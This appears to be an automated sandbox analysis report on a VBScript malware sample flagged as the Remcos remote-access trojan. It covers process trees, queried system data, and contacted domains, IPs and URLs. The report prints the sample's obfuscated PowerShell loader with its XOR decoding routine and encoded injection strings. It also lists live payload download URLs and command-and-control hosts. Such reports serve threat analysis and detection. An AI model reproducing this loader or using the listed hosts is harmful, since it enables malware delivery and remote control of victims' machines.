2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D060 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\AdobeError.pdf Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 875681 Sample: 002671299.vbs Startdate: 25/05/2023 Architecture: WINDOWS Score: 84 44 quickcheckx.github.io 2->44 54 Antivirus detection for URL or domain 2->54 56 Sigma detected: Remcos 2->56 11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 58 VBScript performs obfuscated calls to suspicious functions 11->58 60 Wscript starts Powershell (via cmd or directly) 11->60 62 Obfuscated command line found 11->62 64 Very long command line found 11->64 14 powershell.exe 7 11->14         started        17 cmd.exe 1 11->17         started        19 cmd.exe 1 11->19         started        process6 signatures7 66 Very long command line found 14->66 21 powershell.exe 14->21         started        23 conhost.exe 14->23         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        process8 process9 29 ielowutil.exe 9 15 21->29         started        33 ieinstal.exe 21->33         started        35 ieinstal.exe 21->35         started        37 9 other processes 21->37 dnsIp10 48 apdfhost.online 51.89.53.37, 2404, 49700 OVHFR France 29->48 50 zeusblog.cloud 104.168.213.196, 443, 49697 HOSTWINDSUS United States 29->50 52 3 other IPs or domains 29->52 68 Tries to detect Any.run 29->68 70 Hides threads from debuggers 29->70 39 AcroRd32.exe 39 29->39         started        signatures11 process12 process13 41 RdrCEF.exe 75 39->41         started        dnsIp14 46 192.168.2.1 unknown unknown 41->46
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
51.89.53.37
 apdfhost.online France
16276 OVHFR false
104.168.213.196
 zeusblog.cloud United States
54290 HOSTWINDSUS false
185.199.108.153
 unknown Netherlands
54113 FASTLYUS false
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
quickcheckx.github.io 185.199.110.153 true
zeusblog.cloud 104.168.213.196 true
geoplugin.net 178.237.33.50 true
apdfhost.online 51.89.53.37 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown
https://quickcheckx.github.io/quickme/KmJiw22.bin false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://zeusblog.cloud/Adobe.pdf false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://quickcheckx.github.io/quickme/KmJiw22.bin false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown